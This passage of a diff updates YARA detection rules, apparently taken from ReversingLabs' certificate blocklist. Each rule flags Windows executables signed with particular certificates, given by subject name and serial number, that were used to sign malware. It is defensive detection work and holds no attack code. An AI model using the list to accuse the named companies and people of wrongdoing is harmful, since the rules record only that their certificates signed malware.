-		id = "506b217e-ea82-5f14-880e-b6c0cbb001fb"
+		id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15608-L15626"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9708-L9726"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f"
+		logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27845,21 +50239,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEGAPOLISELIT, OOO" and ( pe.signatures [ i ] . serial == "00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures [ i ] . serial == "dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" ) and 1497916800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRUST DANMARK ApS" and ( pe.signatures [ i ] . serial == "00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures [ i ] . serial == "cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" ) and 1632884040 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711"
+		id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15628-L15644"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9728-L9746"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321"
+		logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27869,21 +50263,21 @@ rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAQA EVENTS LTD" and ( pe.signatures [ i ] . serial == "00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures [ i ] . serial == "e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" ) and 1634720407 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4224bf1-1875-5b2c-b79d-998d3766d163"
+		id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15646-L15664"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9748-L9764"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59"
+		logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27893,21 +50287,21 @@ rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES LTD." and ( pe.signatures [ i ] . serial == "00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures [ i ] . serial == "a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" ) and 1547424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rose Holm International ApS" and pe.signatures [ i ] . serial == "75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6dd35efb-daea-5668-a01d-f5b80371b04c"
+		id = "7f98e550-fca6-564f-bbad-40e153f17adc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15666-L15682"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9766-L9782"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0"
+		logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27917,21 +50311,21 @@ rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBM" and pe.signatures [ i ] . serial == "30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "478994c1-c1c4-5f11-b78f-fe237b687bef"
+		id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15684-L15700"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9784-L9802"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0"
+		logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27941,21 +50335,21 @@ rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sopiteks LLC" and ( pe.signatures [ i ] . serial == "00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures [ i ] . serial == "a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" ) and 1631908320 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92"
+		id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15702-L15718"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9804-L9820"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71"
+		logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27965,21 +50359,21 @@ rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures [ i ] . serial == "44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures [ i ] . serial == "33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316"
+		id = "3ff8149b-4a90-5593-b12a-d815b04fce7e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15720-L15736"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9822-L9840"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5"
+		logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27989,21 +50383,21 @@ rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Argus Security Maintenance Systems Inc." and ( pe.signatures [ i ] . serial == "00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures [ i ] . serial == "be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" ) and 1634235015 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff"
+		id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15738-L15754"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9842-L9858"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e"
+		logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28013,21 +50407,21 @@ rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV \"MARIYA\"" and pe.signatures [ i ] . serial == "64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CB CAM SP Z O O" and pe.signatures [ i ] . serial == "0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7eae73e-6b12-5507-846e-d3b409243adf"
+		id = "8e059a2a-c436-5247-b395-a2f594c1c9a9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15756-L15772"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9860-L9878"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571"
+		logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28037,21 +50431,21 @@ rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) and 1635153791 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4"
+		id = "63938a97-2cb3-52b0-9717-c8949e3fae46"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15774-L15790"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9880-L9898"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d"
+		logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28061,21 +50455,21 @@ rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telefonicasa" and pe.signatures [ i ] . serial == "08:3e:3f" and 999002664 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fjordland Bike Wear ApS" and ( pe.signatures [ i ] . serial == "00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures [ i ] . serial == "ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" ) and 1636145940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1"
+		id = "50cc539a-1f00-566d-a83f-b4d8459506d8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15792-L15808"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9900-L9918"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b"
+		logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28085,21 +50479,21 @@ rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL-FORCE ApS" and ( pe.signatures [ i ] . serial == "00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures [ i ] . serial == "cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" ) and 1636111842 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d"
+		id = "a72a0001-a272-506d-b610-c028ed8ac6da"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15810-L15826"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9920-L9938"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38"
+		logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28109,21 +50503,21 @@ rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT, LLC" and ( pe.signatures [ i ] . serial == "00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures [ i ] . serial == "d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" ) and 1636456620 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b"
+		id = "e5643d08-5957-58b0-8b46-d5e339dfba9c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15828-L15844"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9940-L9956"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f"
+		logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28133,21 +50527,21 @@ rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE CLEAN LTD" and pe.signatures [ i ] . serial == "30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de"
+		id = "3ffb592c-eec5-51b1-9840-b6b72269fc31"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15846-L15862"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9958-L9976"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840"
+		logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28157,21 +50551,21 @@ rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
 		importance = 25
 
 	condition:
